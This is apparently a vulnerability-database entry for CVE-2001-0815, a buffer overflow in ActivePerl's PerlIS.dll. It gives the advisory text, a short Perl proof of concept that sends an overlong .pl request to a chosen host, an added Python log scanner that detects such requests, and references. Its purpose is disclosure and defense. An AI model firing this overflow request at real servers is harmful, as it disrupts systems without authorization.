Activestate ActivePerl PerlIS.dll Code Execution Vulnerability

Vulnerability ID: 1106515    Vulnerability type: Buffer overflow
Published: 2001-11-15    Updated: 2005-05-02
CVE ID: CVE-2001-0815
CNNVD-ID: CNNVD-200112-035
Platform: Multiple    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/21154
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-035
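|Vulnerability details
A buffer overflow vulnerability exists in PerlIS.dll in Activestate ActivePerl 5.6.1.629 and earlier. A remote attacker can execute arbitrary code via an HTTP request containing an overly long file name that ends with the .pl extension.
|Exploit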
source: http://www.securityfocus.com/bid/3526/info
  
ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems developed by Activestate. ActivePerl allows for high-performance integration with IIS using a DLL called 'perlIIS.dll' to handle a '.plx' ISAPI extension.
  
perlIIS.dll contains a remotely exploitable buffer overflow vulnerability in handling of the URL string. It is due to an unbounded string copy operation.
  
All versions of ActivePerl prior to build 630 of ActivePerl 5.6.1 are believed to be vulnerable. This vulnerability requires that the option "Check that file exists" be disabled. This option is enabled by default.
  
Exploitation of this vulnerability may allow for remote attackers to gain access to the target server.

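#!/usr/bin/perl -w
# Proof of concept: sends one GET request whose file name is 360 bytes long
# and ends in .pl, the overlong URL described above.

use IO::Socket;

my $target = "ActivePerl 5.6.1.629";

unless (@ARGV == 1) {
  print "\n $target Exploit by Sapient2003\n";
  die "usage: $0 <host to exploit>\n";
}
print "\n $target Exploit by Sapient2003\n";

# Overlong file name used as the request path
my $buffer = "A" x 360;
my $request = "GET /$buffer.pl HTTP/1.0\n\n";

# Connect to the web server on port 80 and send the request
my $sock = IO::Socket::INET->new(
        PeerAddr => $ARGV[0],
        PeerPort => 80,
        Proto    => "tcp",
) or die "Can't find host $ARGV[0]\n";
print $sock $request;
print "Attempted to exploit $ARGV[0]...\n";
close($sock);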
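
A detection counterpart to the request described above, added here as an example and not part of the original advisory or exploit: it scans an IIS W3C extended log for .pl/.plx requests whose file name is longer than 255 characters, the NTFS file-name limit, so the name cannot belong to a script that exists on disk. The log lines, the addresses and the function name suspicious_requests are constructed for illustration.

```python
"""Flag IIS requests whose Perl script name is too long to be a real file."""
from urllib.parse import unquote

MAX_COMPONENT = 255          # NTFS limit for a single file name
PERL_EXTS = (".pl", ".plx")  # extensions named on this page

# Constructed sample in IIS W3C extended log format (not real traffic).
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem sc-status",
    "2001-11-16 10:02:11 192.0.2.10 GET /scripts/report.plx 200",
    "2001-11-16 10:02:40 192.0.2.77 GET /" + "A" * 360 + ".pl 500",
    "2001-11-16 10:03:05 192.0.2.10 GET /images/logo.gif 200",
    "2001-11-16 10:03:09 192.0.2.78 GET /" + "%41" * 300 + ".plx 500",
])


def suspicious_requests(log_text, limit=MAX_COMPONENT):
    """Return (client_ip, name_length, status) for over-long Perl script names."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue                         # skip directives and rows with no schema
        row = dict(zip(fields, line.split()))
        stem = unquote(row.get("cs-uri-stem", ""))  # undo %XX padding if present
        name = stem.rsplit("/", 1)[-1]       # last path segment = script file name
        if name.lower().endswith(PERL_EXTS) and len(name) > limit:
            hits.append((row.get("c-ip", "-"), len(name), row.get("sc-status", "-")))
    return hits


if __name__ == "__main__":
    for ip, length, status in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: {length}-character Perl script name, status {status}")
```

The column order is read from the `#Fields:` directive, so the check follows whatever field set the server is configured to log.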
|References

Source: BID
Name: 3526
Link: http://www.securityfocus.com/bid/3526
Source: BUGTRAQ
Name: 20011115 NSFOCUS SA2001-07: ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=100583978302585&w=2
Source: bugs.activestate.com
Link: http://bugs.activestate.com/show_bug.cgi?id=18062
Source: XF
Name: activeperl-perlis-filename-bo(7539)
Link: http://xforce.iss.net/static/7539.php
Source: OSVDB
Name: 678
Link: http://www.osvdb.org/678
